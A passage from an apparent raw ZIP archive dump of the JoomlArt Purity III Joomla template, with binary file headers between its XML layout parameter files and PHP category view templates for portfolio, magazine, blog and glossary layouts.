        <option value="rhits">JGLOBAL_LEAST_HITS</option>
        <option value="order">JGLOBAL_ORDERING</option>
    </field>

    <field name="order_date" type="list"
           description="JGLOBAL_ORDERING_DATE_DESC"
           label="JGLOBAL_ORDERING_DATE_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="created">JGLOBAL_CREATED</option>
        <option value="modified">JGLOBAL_MODIFIED</option>
        <option value="published">JPUBLISHED</option>
    </field>

    <field name="article_layout" type="componentlayout"
                 label="Article Layout"
                 description="JFIELD_ALT_COMPONENT_LAYOUT_DESC"
                 useglobal="true"
                 extension="com_content" view="article"
                    />
</fieldset>

    <fieldset name="article" label="COM_CONTENT_ATTRIBS_FIELDSET_LABEL">
        <field name="show_title" type="list"
               description="JGLOBAL_SHOW_TITLE_DESC"
               label="JGLOBAL_SHOW_TITLE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_titles" type="list"
               description="JGLOBAL_LINKED_TITLES_DESC"
               label="JGLOBAL_LINKED_TITLES_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_intro" type="list"
               description="JGLOBAL_SHOW_INTRO_DESC"
               label="JGLOBAL_SHOW_INTRO_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field
                name="info_block_position"
                type="list"
                default=""
                label="COM_CONTENT_FIELD_INFOBLOCK_POSITION_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">COM_CONTENT_FIELD_OPTION_ABOVE</option>
            <option value="1">COM_CONTENT_FIELD_OPTION_BELOW</option>
            <option value="2">COM_CONTENT_FIELD_OPTION_SPLIT</option>
        </field>

        <field name="show_category" type="list"
               description="JGLOBAL_SHOW_CATEGORY_DESC"
               label="JGLOBAL_SHOW_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_category" type="list"
               description="JGLOBAL_LINK_CATEGORY_DESC"
               label="JGLOBAL_LINK_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_parent_category" type="list"
               description="JGLOBAL_SHOW_PARENT_CATEGORY_DESC"
               label="JGLOBAL_SHOW_PARENT_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_parent_category" type="list"
               description="JGLOBAL_LINK_PARENT_CATEGORY_DESC"
               label="JGLOBAL_LINK_PARENT_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_author" type="list"
               description="JGLOBAL_SHOW_AUTHOR_DESC"
               label="JGLOBAL_SHOW_AUTHOR_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_author" type="list"
               label="JGLOBAL_LINK_AUTHOR_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNo</option>
            <option value="1">JYes</option>
        </field>

        <field name="show_create_date" type="list"
               description="JGLOBAL_SHOW_CREATE_DATE_DESC"
               label="JGLOBAL_SHOW_CREATE_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_modify_date" type="list"
               description="JGLOBAL_SHOW_MODIFY_DATE_DESC"
               label="JGLOBAL_SHOW_MODIFY_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_publish_date" type="list"
               description="JGLOBAL_SHOW_PUBLISH_DATE_DESC"
               label="JGLOBAL_SHOW_PUBLISH_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_item_navigation" type="list"
               description="JGLOBAL_SHOW_NAVIGATION_DESC"
               label="JGLOBAL_SHOW_NAVIGATION_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>


        <field
                name="show_vote" type="list"
                label="JGLOBAL_SHOW_VOTE_LABEL"
                description="JGLOBAL_SHOW_VOTE_DESC"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option	value="1">JSHOW</option>
        </field>

        <field
                name="show_readmore"
                type="list"
                description="JGLOBAL_SHOW_READMORE_DESC"
                label="JGLOBAL_SHOW_READMORE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field
                name="show_readmore_title"
                type="list"
                label="JGLOBAL_SHOW_READMORE_TITLE_LABEL"
                description="JGLOBAL_SHOW_READMORE_TITLE_DESC"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_icons" type="list"
               label="JGLOBAL_SHOW_ICONS_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_print_icon" type="list"
               label="JGLOBAL_SHOW_PRINT_ICON_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_email_icon" type="list"
               label="JGLOBAL_Show_Email_Icon_Label">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_hits" type="list"
               label="JGLOBAL_SHOW_HITS_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_noauth" type="list"
               description="JGLOBAL_SHOW_UNAUTH_LINKS_DESC"
               label="JGLOBAL_SHOW_UNAUTH_LINKS_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

    </fieldset>
</fields>
</metadata>
PKԜ�\g�[+�	�	7purity_iii/html/com_content/category/portfolio_item.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

// no direct access
defined('_JEXEC') or die('Restricted access');

use Joomla\CMS\HTML\HTMLHelper;

// Define default image size (do not change)
$attribs = new JRegistry($this->item->attribs);
$params = $this->item->params;
$images = json_decode($this->item->images);
?>

<div class="thumbnail">

	<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid)); ?>" title="">
		<?php if (isset($images->image_intro) && !empty($images->image_intro)) : ?>
    <div class="item-image">
		  <img src="<?php echo htmlspecialchars($images->image_intro); ?>" alt="<?php echo htmlspecialchars($images->image_intro_alt); ?>"/>
			<?php if ($attribs->get('portfolio-state')) : ?>
			<span class="item-state state-<?php echo $attribs->get('portfolio-state') ?>">
				<?php echo $attribs->get('portfolio-state') ?>
			</span>
			<?php endif ?>
    </div>
		<?php endif; ?>
		<h3><?php echo $this->item->title ?></h3>
	</a>

	<?php if ($params->get('show_intro')) : ?>
		<?php echo $this->item->introtext ?>
	<?php endif ?>

	<?php if ($attribs->get('portfolio-demo')) : ?>
		<p class="item-demo-url">
			<a class="btn btn-default" href="<?php echo $attribs->get('portfolio-demo') ?>">Live Demo</a>
		</p>
	<?php endif ?>
  
  <?php if ($params->get('show_readmore')) :
    if ($params->get('access-view')) :
      $link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
    else :
      $menu = JFactory::getApplication()->getMenu();
      $active = $menu->getActive();
      $itemId = $active->id;
      $link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
      $link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)));
    endif; ?>

    <?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $this->item, 'params' => $params, 'link' => $link)); ?>

  <?php endif; ?>

</div>PKԜ�\�V�/purity_iii/html/com_content/category/index.htmlnu&1i�<!DOCTYPE html><title></title>
PKԜ�\�S��335purity_iii/html/com_content/category/magazine-sub.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */
defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
JHtml::_('behavior.caption');

$params     = $this->params;

//show info block?
$useDefList =
	($params->get('show_modify_date') ||
		$params->get('show_publish_date') ||
		$params->get('show_create_date') ||
		$params->get('show_hits') ||
		$params->get('show_category') ||
		$params->get('show_parent_category') ||
		$params->get('show_author'));
$info_positions = $params->get('subcat_info_positions', array());

// intro
$cols      = $params->get('num_columns', 3);
$col_width = round(12 / $cols);
$i         = 0;
?>

<?php if ($this->params->get('show_page_heading', 1)) : ?>
	<div class="page-header">
		<h1><?php echo $this->escape($this->params->get('page_heading')); ?></h1>
	</div>
<?php endif; ?>

<?php if ($this->params->get('show_category_title', 1) or $this->params->get('page_subheading')) : ?>
	<div class="page-subheader">
		<h2> <?php echo $this->escape($this->params->get('page_subheading')); ?>
			<?php if ($this->params->get('show_category_title')) : ?>
				<span class="subheading-category"><?php echo $this->category->title;?></span>
			<?php endif; ?>
		</h2>
	</div>
<?php endif; ?>

<div class="magazine-category">
	<?php if (count($this->lead_items)): ?>
		<div class="magazine-leading">
			<?php foreach ($this->lead_items as $item) : ?>
				<div class="magazine-item">

					<?php echo JLayoutHelper::render('joomla.content.intro_image', $item); ?>

					<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>

					<?php // Todo Not that elegant would be nice to group the params ?>

					<?php if ($useDefList && in_array('leading', $info_positions)) : ?>
						<aside class="article-aside clearfix">
							<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
						</aside>
					<?php endif; ?>

					<?php //as we always show intro text for leading ?>
					<?php /* if (!$params->get('show_intro')) : ?>
						<?php echo $item->event->afterDisplayTitle; ?>
					<?php endif; */ ?>

					<?php echo $item->event->beforeDisplayContent; ?>
					<div class="magazine-item-ct">
						<?php echo $item->introtext; ?>
					</div>

					<?php if ($useDefList && in_array('leading', $info_positions)) : ?>
						<aside class="article-aside clearfix">
							<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'below')); ?>
						</aside>
					<?php endif; ?>

					<?php if ($params->get('show_readmore') && $item->readmore) :
						if ($item->params->get('access-view')) :
							$link = JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid));
						else :
							$menu      = JFactory::getApplication()->getMenu();
							$active    = $menu->getActive();
							$itemId    = $active->id;
							$link1     = JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId);
							$returnURL = JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid));
							$link      = new JUri($link1);
							$link->setVar('return', base64_encode($returnURL));
						endif; ?>

						<section class="readmore">
							<a class="btn btn-default" href="<?php echo $link; ?>"><span>

								<?php if (!$item->params->get('access-view')) :
									echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
								elseif ($readmore = $item->alternative_readmore) :
									echo $readmore;
									if ($params->get('show_readmore_title', 0) != 0) :
										echo JHtml::_('string.truncate', ($item->title), $params->get('readmore_limit'));
									endif;
								elseif ($params->get('show_readmore_title', 0) == 0) :
									echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
								else :
									echo JText::_('COM_CONTENT_READ_MORE');
									echo JHtml::_('string.truncate', ($item->title), $params->get('readmore_limit'));
								endif; ?>

							</span></a>
						</section>

					<?php endif; ?>

					<?php echo $item->event->afterDisplayContent; ?>

				</div>
			<?php endforeach; ?>
		</div>
	<?php endif ?>

	<?php if (count($this->intro_items)): ?>
	<div class="magazine-intro">
		<?php foreach ($this->intro_items as $item) : ?>

			<?php if ($i == 0): /* start new row */ ?>
				<div class="row row-articles">
			<?php endif ?>

					<div class="col-sm-<?php echo $col_width ?> magazine-item">
						<?php echo JLayoutHelper::render('joomla.content.intro_image', $item); ?>
						<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>

						<?php if ($useDefList && in_array('intro', $info_positions) && in_array($params->get('info_block_position', 0), array(0, 2))) : ?>
							<aside class="article-aside clearfix">
								<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
							</aside>
						<?php endif; ?>

						<?php if (!$params->get('show_subcat_intro', 1)) : ?>
							<?php echo $item->event->afterDisplayTitle; ?>
						<?php endif; ?>
						<?php echo $item->event->beforeDisplayContent; ?>

						<?php if($params->get('show_subcat_intro', 1)) : ?>
						<div class="magazine-item-ct">
							<?php echo $item->introtext; ?>
						</div>
						<?php endif; ?>

						<?php if ($useDefList && in_array('intro', $info_positions) && in_array($params->get('info_block_position', 0), array(1, 2))) : ?>
							<aside class="article-aside clearfix">
								<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'below')); ?>
							</aside>
						<?php endif; ?>

						<?php echo $item->event->afterDisplayContent; ?>

					</div>

			<?php if ($i == $cols - 1): /* close row */ ?>
				</div>
			<?php endif ?>
			<?php if (++$i >= $cols) $i = 0; ?>
		<?php endforeach; ?>

	<?php if ($i > 0): /* close row */ ?>
		</div>
	<?php endif ?>

	</div>
	<?php endif ?>

	<?php if (count($this->link_items)): ?>
	<div class="magazine-links">
		<?php foreach ($this->link_items as $item) : ?>
			<div class="magazine-item link-item">
				<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>
				<?php if ($useDefList && in_array('link', $info_positions)) : ?>
					<aside class="article-aside clearfix">
						<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
					</aside>
				<?php endif; ?>
			</div>
		<?php endforeach; ?>
	</div>
	<?php endif ?>

	<?php if (($params->def('show_pagination', 1) == 1  || ($params->get('show_pagination') == 2)) && ($this->pagination->get('pages.total') > 1)) : ?>
	<div class="pagination">
		<?php  if ($params->def('show_pagination_results', 1)) : ?>
			<p class="counter pull-right"> <?php echo $this->pagination->getPagesCounter(); ?> </p>
		<?php endif; ?>
		<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
	<?php  endif; ?>

</div>PKԜ�\��X		:purity_iii/html/com_content/category/magazine_featured.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */
 
defined('_JEXEC') or die;

// get featured items
$params        = $this->params;
$count_leading = $params->get ('featured_leading', 1);
$count_intro   = $params->get ('featured_intro', 3);
$intro_columns = $params->get ('featured_intro_columns', 3);
$featured_links= $params->get ('featured_links', 5);
$leading       = $intro = $links = array();

$i = 0;
foreach ($this->items as &$item) {

	$item->event = new stdClass;

	// Old plugins: Ensure that text property is available
	if (!isset($item->text))
	{
		$item->text = $item->introtext;
	}
	JPluginHelper::importPlugin('content');
	jFactory::getApplication()->triggerEvent('onContentPrepare', array ('com_content.featured', &$item, &$this->params, 0));

	// Old plugins: Use processed text as introtext
	$item->introtext = $item->text;

	$results = jFactory::getApplication()->triggerEvent('onContentAfterTitle', array('com_content.featured', &$item, &$item->params, 0));
	$item->event->afterDisplayTitle = trim(implode("\n", $results));

	$results = jFactory::getApplication()->triggerEvent('onContentBeforeDisplay', array('com_content.featured', &$item, &$item->params, 0));
	$item->event->beforeDisplayContent = trim(implode("\n", $results));

	$results = jFactory::getApplication()->triggerEvent('onContentAfterDisplay', array('com_content.featured', &$item, &$item->params, 0));
	$item->event->afterDisplayContent = trim(implode("\n", $results));

	if ($i < $count_leading) {
		$leading[] = $item;
	} elseif ($i < $count_leading + $count_intro) {
		$intro[] = $item;
	} elseif ($i < $count_leading + $count_intro + $featured_links) {
		$links[] = $item;
	}

	$i++;
}

//show info block?
$useDefList =
	($params->get('show_modify_date') ||
	$params->get('show_publish_date') ||
	$params->get('show_create_date') ||
	$params->get('show_hits') ||
	$params->get('show_category') ||
	$params->get('show_parent_category') ||
	$params->get('show_author'));

$info_positions = $params->get('featured_info_positions', array());
?>

<div class="magazine-featured">
	<div class="row">
		<div class="col-md-8">
			<?php if (count ($leading)): ?>
				<div class="magazine-leading magazine-featured-leading">
					<?php foreach ($leading as $item) :?>
						<div class="magazine-item">

							<?php echo JLayoutHelper::render('joomla.content.intro_image', $item); ?>

							<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>

							<?php // Todo Not that elegant would be nice to group the params ?>

							<?php if ($useDefList && in_array('leading', $info_positions) && in_array($params->get('info_block_position', 0), array(0, 2))) : ?>
							<aside class="article-aside clearfix">
								<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
							</aside>
							<?php endif; ?>

							<?php if (!$params->get('show_intro')) : ?>
								<?php echo $item->event->afterDisplayTitle; ?>
							<?php endif; ?>

							<?php echo $item->event->beforeDisplayContent; ?>
							<div class="magazine-item-ct">
								<?php echo $item->introtext; ?>
							</div>

							<?php if ($useDefList && in_array('leading', $info_positions) && in_array($params->get('info_block_position', 0), array(1, 2))) : ?>
								<aside class="article-aside clearfix">
									<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'below')); ?>
								</aside>
							<?php  endif; ?>

							<?php if ($params->get('show_readmore') && $item->readmore) :
							    if ($params->get('access-view')) :
							      $link = JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language));
							    else :
							      $menu = JFactory::getApplication()->getMenu();
							      $active = $menu->getActive();
							      $itemId = $active->id;
							      $link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
							      $link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language)));
							    endif; ?>

							    <?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $item, 'params' => $params, 'link' => $link)); ?>

							<?php endif; ?>

							<?php echo $item->event->afterDisplayContent; ?>

						</div>
					<?php endforeach; ?>
				</div>
			<?php endif ?>
		</div> <!-- //Left Column -->

		<div class="col-md-4">
			<?php if (count ($links)): ?>
				<div class="magazine-links magazine-featured-links">
					<?php foreach ($links as $item) :?>
						<div class="magazine-item link-item">
							<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>
							<?php if ($useDefList && in_array('link', $info_positions)) : ?>
								<aside class="article-aside clearfix">
									<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
								</aside>
							<?php  endif; ?>
						</div>
					<?php endforeach; ?>
				</div>
			<?php endif ?>
		</div> <!-- //Right Column -->
	</div> <!-- //Row -->

	<div class="row">
		<?php if ($intro_count = count ($intro)): ?>
			<div class="col-sm-12 magazine-intro magazine-featured-intro">
				<?php $intro_index = 0; ?>
				<?php foreach ($intro as $item) : ?>
					<?php if($intro_index % $intro_columns == 0) : ?>
						<div class="row">
					<?php endif ?>
							<div class="magazine-item col-sm-<?php echo round((12 / $intro_columns)) ?>">
								<?php echo JLayoutHelper::render('joomla.content.intro_image', $item); ?>
								<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $item); ?>

								<?php if ($useDefList && in_array('intro', $info_positions)) : ?>
									<aside class="article-aside clearfix">
										<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $item, 'params' => $params, 'position' => 'above')); ?>
									</aside>
								<?php  endif; ?>

								<?php echo $item->event->afterDisplayTitle; ?>
								<?php echo $item->event->beforeDisplayContent; ?>
								<?php echo $item->event->afterDisplayContent; ?>
							</div>
					<?php $intro_index++; ?>
					<?php if(($intro_index % $intro_columns == 0) || $intro_index == $intro_count) : ?>
						</div>
					<?php endif ?>
				<?php endforeach; ?>
			</div>
		<?php endif ?>
	</div>

</div>PKԜ�\WH�PP3purity_iii/html/com_content/category/xblog_item.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die;
use Joomla\CMS\Factory;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\Component\Content\Administrator\Extension\ContentComponent;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html');
if(version_compare(JVERSION, '3.0', 'lt')){
	JHtml::_('behavior.tooltip');
}
JHtml::_('behavior.framework');

// Create a shortcut for params.
$params  = & $this->item->params;
$images  = json_decode($this->item->images);
$canEdit = $this->item->params->get('access-edit');
$info    = $params->get('info_block_position', 2);
$aInfo1 = ($params->get('show_publish_date') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author'));
$aInfo2 = ($params->get('show_create_date') || $params->get('show_modify_date') || $params->get('show_hits'));
$topInfo = ($aInfo1 && $info != 1) || ($aInfo2 && $info == 0);
$botInfo = ($aInfo1 && $info == 1) || ($aInfo2 && $info != 0);
$icons = $params->get('access-edit') || $params->get('show_print_icon') || $params->get('show_email_icon');

// update catslug if not exists - compatible with 2.5
if (empty ($this->item->catslug)) {
	$this->item->catslug = $this->item->category_alias ? ($this->item->catid.':'.$this->item->category_alias) : $this->item->catid;
}

$currentDate   = Factory::getDate()->format('Y-m-d H:i:s');
$isUnpublished = ($this->item->state == ContentComponent::CONDITION_UNPUBLISHED || $this->item->publish_up > $currentDate)
    || ($this->item->publish_down < $currentDate && $this->item->publish_down !== null);
?>
	<?php if ($isUnpublished) : ?>
		<div class="system-unpublished">
	<?php endif; ?>

	<!-- Article -->
	<article>

		<!-- Intro image -->
		<div class="col-md-4">
			<?php echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>
		</div>

		<div class="col-md-8">
			<?php if ($params->get('show_title')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.item_title', array('item' => $this->item, 'params' => $params, 'title-tag'=>'h2')); ?>
			<?php endif; ?>

			<!-- Aside -->
			<?php if ($topInfo || $icons) : ?>
			<aside class="article-aside clearfix">
				<?php if ($topInfo): ?>
				<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
				<?php endif; ?>
				
				<?php if ($icons): ?>
				<?php echo JLayoutHelper::render('joomla.content.icons', array('item' => $this->item, 'params' => $params)); ?>
				<?php endif; ?>
			</aside>  
			<?php endif; ?>
			<!-- //Aside -->

			<section class="article-intro clearfix">
				<?php if (!$params->get('show_intro')) : ?>
					<?php echo $this->item->event->afterDisplayTitle; ?>
				<?php endif; ?>

				<?php echo $this->item->event->beforeDisplayContent; ?>

				<?php echo $this->item->introtext; ?>
			</section>
			
			<!-- footer -->
			<?php if ($botInfo) : ?>
			<footer class="article-footer clearfix">
				<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
			</footer>
			<?php endif; ?>
			<!-- //footer -->
			<?php if ($params->get('show_readmore')) :
				if ($params->get('access-view')) :
					$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
				else :
					$menu = JFactory::getApplication()->getMenu();
					$active = $menu->getActive();
					$itemId = $active->id;
					$link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
					$link->setVar('return', base64_encode(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)));
				endif; ?>

				<?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $this->item, 'params' => $params, 'link' => $link)); ?>

			<?php endif; ?>
		</div>
	</article>
	<!-- //Article -->

	<?php if ($isUnpublished) : ?>
		</div>
	<?php endif; ?>

<?php echo $this->item->event->afterDisplayContent; ?> 
PKԜ�\b1�V��7purity_iii/html/com_content/category/glossary_group.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die;
?>

<div class="glossary-group">
	<a name="<?php echo $this->group ?>"></a>
	<h3 class="glossary-group-title"><?php echo $this->group ?></h3>
	<div class="glossary-group-items">
		<ul class="row">
		<?php foreach ($this->group_items as $item):
			$title = $item->title;
			$link = JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid));
		?>
				<li class="col-xs-6 col-md-4"><a href="<?php echo $link ?>"><?php echo $title ?></a></li>
		<?php endforeach ?>
		</ul>
	</div>
</div>
PKԜ�\=h���
�
1purity_iii/html/com_content/category/glossary.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<metadata>
	<layout title="xLayout - Glossary" option="COM_CONTENT_CATEGORY_VIEW_BLOG_OPTION">
		<help
			key="JHELP_MENUS_MENU_ITEM_ARTICLE_CATEGORY_BLOG"/>
		<message>
			<![CDATA[COM_CONTENT_CATEGORY_VIEW_BLOG_DESC]]>
		</message>
	</layout>

	<!-- Add fields to the request variables for the layout. -->
	<fields name="request">
		<fieldset name="request">

			<field name="id" type="category"
						 description="JGLOBAL_CHOOSE_CATEGORY_DESC"
						 extension="com_content"
						 label="JGLOBAL_CHOOSE_CATEGORY_LABEL"
						 required="true"/>

		</fieldset>
	</fields>

	<!-- Add fields to the parameters object for the layout. -->
	<fields name="params">
		<fieldset name="basic" label="Options">
            <field name="layout_type" type="hidden" default="blog"/>
            <field name="featured_leading" type="hidden" default="0"/>
            <field name="featured_intro" type="hidden" default="0"/>
            <field name="featured_intro_columns" type="hidden" default="0"/>
            <field name="featured_links" type="hidden" default="0"/>
            <field name="orderby_pri" type="hidden" default="none"/>
            <field name="orderby_sec" type="hidden" default="alpha"/>
            <field name="article_ordering" type="hidden" default="a.title"/>
            <field name="show_category_title" type="list"
                   label="JGLOBAL_SHOW_CATEGORY_TITLE"
                   description="JGLOBAL_SHOW_CATEGORY_TITLE_DESC"
                    >
                <option value="">JGLOBAL_USE_GLOBAL</option>
                <option value="0">JHIDE</option>
                <option value="1">JSHOW</option>
            </field>

            <field name="show_description" type="list"
                   description="JGLOBAL_SHOW_CATEGORY_DESCRIPTION_DESC"
                   label="JGLOBAL_SHOW_CATEGORY_DESCRIPTION_LABEL"
                    >
